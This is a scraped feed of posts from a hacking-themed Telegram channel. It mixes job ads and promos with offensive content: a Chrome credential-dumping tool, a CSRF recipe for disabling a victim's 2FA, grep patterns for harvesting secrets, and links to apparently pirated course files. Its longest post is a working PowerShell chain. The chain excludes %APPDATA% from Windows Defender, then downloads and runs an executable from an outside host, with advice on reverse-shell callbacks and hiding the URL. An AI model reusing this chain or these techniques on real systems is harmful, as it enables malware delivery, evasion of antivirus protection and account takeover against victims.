Hacking Vidhya
前往频道在 Telegram
We Talk about : Hacking , CTFs , Pentesting , Red & Blue Team etc. Not Allowed: Selling, Carding, Cracking Crypto.
显示更多385
订阅者
+224 小时
+47 天
+2430 天
帖子存档
JUSPAY is currently hiring for the following security roles. If you’re interested, please apply using the links below:
• VA Security Analyst – I
https://joinus.juspay.in/?jobId=VSA-I01
• Security Analyst – I
https://joinus.juspay.in/?jobId=SA-I01
• Cloud Security Analyst – I
https://joinus.juspay.in/?jobId=CSA-I01
• Senior SOC Analyst
https://joinus.juspay.in/?jobId=SSA01
Tredence is hiring for AI and Data Science team. We’re looking for talented professionals for below roles:
1. Data Scientists
2. Senior Data Scientists
3. Data Science Managers
4. Senior Data Science Managers
5. Gen Ai Architects
6. Gen Ai Senior Architects
📌 Experience: 3 to 18 years
Notice: Early joiners (30 days)
📍 Locations: Bangalore, Chennai, Gurgaon, Pune, Kolkata, Hyderabad
🏢 Work Mode: Hybrid
If you're passionate about driving innovation through AI, send your profile to ruchi.singh@tredence.com
DumpChromeSecrets
Extract data from modern Chrome versions, including refresh tokens, cookies, saved credentials, autofill data, browsing history, and bookmarks.
ZeroToMastery - Prompt Engineering Bootcamp (Working With LLMs): Zero to Mastery
Part 1 : https://pixeldrain.com/u/yZ8uFXSH
Part 2 : https://pixeldrain.com/u/52b8DXS3
Google is hiring Data Analyst 🚀🌟
Experience : 4 Years
Location : Hyderabad
Apply link : https://careers.google.com/jobs/results/138918982781412038-data-analyst
All the best 👍 👍
Free Domain from Namecheap! 🔥
📣Code Promo: FREEDOMAIN26📣
How to claim:
1. Visit Namecheap.com
2. Find name .online, .site, or .store as u need.
3. Enter code at check out & get free.
2FA Bypass via CSRF:🍸
1. Create two Account attacker@test.com & victim@test.com
2. Login as Attacker and capture the 2FA disable request.
3.Create or Generate a CSRF PoC & save as .html
4.Now login with victim account and execute CSRF Poc.
5.2FA disabled successfully & attacker able to bypass the 2FA
✎Grep tips for Javascript Analysis
• Extracting JavaScript Files from recursive Directories
find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;
• Searching for API Keys and Secrets
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
• Detecting Dangerous Function Calls
cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"
• Checking for URL Manipulation
cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"
• Searching for Cross-Origin Requests
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
• Analyzing postMessage Usage
cat * | grep -r "postMessage"
• Finding Hardcoded URLs or Endpoints
cat * | grep -rE "https?://|www\."
• Locating Debugging Information
cat * | grep -rE "console\.log|debugger|alert|console\.dir"
• Investigating User Input Handling
cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"
#bugbounty #recon #javascript🚨 Market Hack on Binance and Trader's $1M Profit
A hacker gained access to market maker accounts on Binance and tried to withdraw stolen funds by manipulating the low-liquidity token BROCCOLI.
Trader Vida responded to alerts, promptly opened long positions, and then secured a profit of $1 million, skillfully leveraging the price movement and order book behavior.
🔗 Details
Wishing everyone a groundbreaking Happy New Year 2026 from Hacking Vidhya! 🚀 May this year be filled with innovative discoveries, impenetrable solutions, and endless learning opportunities in the world of cyber. Let's make 2026 our most secure year yet!
⏳ Audit Challenge Incoming
FlyingTulip’s contest launches Jan 5, 15:00 UTC with 100,000 USDC up for grabs.
Test your skills and see if you can claim the reward before time runs out.
🔗 Details
🔒 PowerShell Payload Breakdown for Pentesters 🔒
▶️This snippet is a classic red team tactic for initial access persistence or payload delivery in a controlled engagement. It's designed to bypass Windows Defender (AV) and quietly drop + execute a binary.
First Command: AV Exclusion Magic 🛡
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%appdata%"
🤨 What it does: This silently tells Windows Defender to ignore scans on the %APPDATA% folder (user's app data dir, like C:\Users\Victim\AppData\Roaming). Why? So your payload lands there without getting nuked. It's a quick persistence enabler - common in post-exploitation to hide tools.
🍳 Arg Breakdown:
▶️powershell: Launches PowerShell (duh).
▶️-inputformat none: Ignores stdin - keeps it headless, no prompts.
▶️-outputformat none: Suppresses fancy output formatting, raw & quiet.
▶️-NonInteractive: No user interaction - runs like a ghost in the machine. Perfect for scripts or Cobalt Strike beacons.
▶️-Command: Executes the following as a one-liner.
▶️Add-MpPreference -ExclusionPath "%appdata%": Core cmdlet. Add-MpPreference tweaks Defender prefs, -ExclusionPath adds a folder to the "do not scan" list. %appdata% expands to the victim's Roaming dir - stealthy spot for droppables.
🕔 Real-Time Usage:
▶️Scenario: You've got shell access via phishing (e.g., Empire or Sliver). Run this pre-drop to whitelist your landing zone.
▶️Live Flow: Inject via cmd.exe or Meterpreter: execute -f powershell.exe -a "...full cmd...". Defender chills out, no alerts. Takes ~1-2 secs.
💡 Pro Tip: Chain with net user for privesc if needed.
Second Command: Download & Execute Shenanigans 📥➡️🔥
powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://bursahotelphuket.com/zip/client.exe' -OutFile '%appdata%\b.exe'; %appdata%\b.exe"
🤨 What it does: A three-stage rocket: Sets secure TLS, downloads a shady .exe (your payload, like a reverse shell), saves it to the excluded %APPDATA%, then executes it immediately. Boom - your C2 callback without tripping wires. This is fileless-ish evasion gold for pentesters testing AV gaps.
🍳 Arg Breakdown:
▶️powershell -c: Short for -Command runs the script block in {}. Quick and dirty for one-shots.
▶️[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;: TLS Fixer. Old PowerShell defaults to TLS 1.0 (insecure/dead). This forces TLS 1.2 so your HTTPS download doesn't flop on modern servers. (Semicolon ; chains commands.)
▶️Invoke-WebRequest -Uri 'https://bursahotelphuket.com/zip/client.exe' -OutFile '%appdata%\b.exe';: The downloader. Invoke-WebRequest (alias iwr) fetches like curl. -Uri is the source (here, a fake hotel site - C2 server in disguise). -OutFile dumps to %APPDATA%\b.exe (short name = less suspicious). Semicolon chains to execution.
▶️%appdata%\b.exe: The Trigger. Just runs the fresh binary. No args passed - assumes it's self-contained (e.g., your custom RAT).
🕔 Real-Time Usage:
▶️Scenario: Post-phish or RDP pivot. Your C2 (e.g., Covenant or your VPS) hosts client.exe (a stager like nish.exe for Nishang or a custom beacon).
▶️Live Flow:
1️⃣ Victim clicks your lure → shell pops.
2️⃣Run via cmd: powershell -c "..." (or encode in JS for web delivery).
3️⃣Timeline: Download: 2-5 secs (depending on BW). Exec: Instant callback to your listener (nc -lvnp 4444 or Empire stager).
4️⃣ Evasion Layer: Excluded path + TLS + short filename = low sig. Monitor with ProcMon for artifacts.
💡 Pro Tip: Obfuscate URL with shorteners (bit.ly) or host on GitHub for "legit" vibes. Test in lab first
🚀 Payload airborne.